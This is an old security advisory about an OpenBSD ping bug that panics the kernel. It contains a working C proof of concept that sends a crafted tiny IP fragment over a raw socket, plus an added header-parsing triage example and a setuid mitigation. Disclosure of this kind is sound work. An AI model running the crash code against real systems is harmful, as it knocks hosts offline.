5th Aug 1997 [SBWID-180]
COMMAND
	    ping
SYSTEMS AFFECTED
	    OpenBSD
PROBLEM
	    Ficus carica found the following on his OpenBSD.current PPP system:
	
	        ping -s2955 1.2.3.4
	
	    or
	
	        ping -s1455 1.2.3.4
	
	    causes a kernel panic.
	    Thankfully this bug does NOT appear to be remotely exploitable.
	    There is second-hand confirmation that this problem exists under
	    NetBSD as well.  Note that in order for the previous commands to
	    cause a reboot, the system must NOT have a default route.  This
	    could tend to reduce the impact of the bug.
	    Note also that this bug does not trigger in a large number of
	    cases, and it is only a bug.  Anyway, code follows:
	
	    /* 1-3 bytes of fragment data will cause panic.                 */
	    /* ping -pff -s2955 to some interface with an MTU of 1500 bytes */
	    /* will recreate this packet, so it's clearly legal.            */
	    /* If it doesn't work, mail me for the original program.        */
	    /* Ficus carica <[email protected]>                   */
	    #include <sys/types.h>
	    #include <sys/socket.h>
	    #include <netinet/in.h>
	    #include <arpa/inet.h>   /* inet_addr() */
	    #include <unistd.h>      /* close() */
	    char buf[] = "\x45\x00\x00\x17\x02\x7A\x01\x72\xFF\x01\xA7\xE6"
	                 "\x01\x02\x03\x04\x05\x06\x07\x08\xFF\xFF\xFF";
	    /* will not panic with more than three bytes    ^^  ^^  ^^      */
	    int main(void) {
	            struct sockaddr_in thesocket;
	            int sockd, on = 1;
	            thesocket.sin_family = AF_INET;
	            thesocket.sin_addr.s_addr = inet_addr("127.0.0.1");
	            sockd = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
	            setsockopt(sockd,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on));
	            /* sizeof(buf) - 1 because of null terminator */
	            sendto(sockd, buf, sizeof(buf)-1, 0x0,
	                    (struct sockaddr *)&thesocket, sizeof(thesocket));
	            close(sockd);
	            return 0;
	    }
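
For triage, the header in buf[] can be decoded to show what the listing's comments describe: a non-first fragment carrying three data bytes, which is what "ping -s2955" leaves as its last fragment at an MTU of 1500. This is an added example, not part of the original advisory; inspect_ipv4, last_fragment_len and struct frag_info are hypothetical names, and a 20-byte IP header without options is assumed for the fragment-size arithmetic.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
/* Bytes of buf[] from the listing above (used here only as parser input). */
const uint8_t page_packet[] = {
    0x45,0x00,0x00,0x17,0x02,0x7A,0x01,0x72,0xFF,0x01,0xA7,0xE6,
    0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0xFF,0xFF,0xFF };
/* Constructed sample: unfragmented 28-byte ICMP packet, checksum left zero. */
const uint8_t plain_packet[] = {
    0x45,0x00,0x00,0x1C,0x00,0x01,0x00,0x00,0x40,0x01,0x00,0x00,
    0x7F,0x00,0x00,0x01,0x7F,0x00,0x00,0x01,8,0,0,0,0,0,0,0 };

struct frag_info {
    int valid, is_fragment, tiny;   /* tiny: fragment with 1-3 data bytes */
    unsigned offset, data_len;      /* both in bytes */
};

/* Parse an IPv4 header and report the fragment fields (hypothetical helper). */
struct frag_info inspect_ipv4(const uint8_t *p, size_t len)
{
    struct frag_info r = {0, 0, 0, 0, 0};
    if (len < 20 || (p[0] >> 4) != 4) return r;
    unsigned hlen  = (p[0] & 0x0Fu) * 4u;
    unsigned total = ((unsigned)p[2] << 8) | p[3];
    unsigned ff    = ((unsigned)p[6] << 8) | p[7];   /* flags + 13-bit offset */
    if (hlen < 20 || total < hlen || total > len) return r;
    r.valid = 1;
    r.offset = (ff & 0x1FFFu) * 8u;                  /* offset is in 8-byte units */
    r.is_fragment = (ff & 0x2000u) != 0 || r.offset != 0;  /* MF set or offset>0 */
    r.data_len = total - hlen;
    r.tiny = r.is_fragment && r.data_len >= 1 && r.data_len <= 3;
    return r;
}

/* Data bytes in the last fragment of "ping -s icmp_data" at the given MTU. */
unsigned last_fragment_len(unsigned icmp_data, unsigned mtu)
{
    if (mtu < 28) return 0;                          /* no room for any payload */
    unsigned payload  = icmp_data + 8;               /* 8-byte ICMP header */
    unsigned per_frag = ((mtu - 20) / 8) * 8;        /* 20-byte IP header assumed */
    return payload % per_frag ? payload % per_frag : per_frag;
}

int main(void)
{
    struct frag_info f = inspect_ipv4(page_packet, sizeof page_packet);
    printf("offset=%u data=%u tiny=%d; -s2955 @1500 leaves %u bytes\n",
           f.offset, f.data_len, f.tiny, last_fragment_len(2955, 1500));
    return 0;
}
```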
	
SOLUTION
	    Fix should be read as:
	
	        1: chmod a-s /usr/sbin/traceroute /sbin/ping
	        2: avoid goofing around with home made packet fraggers
	
	
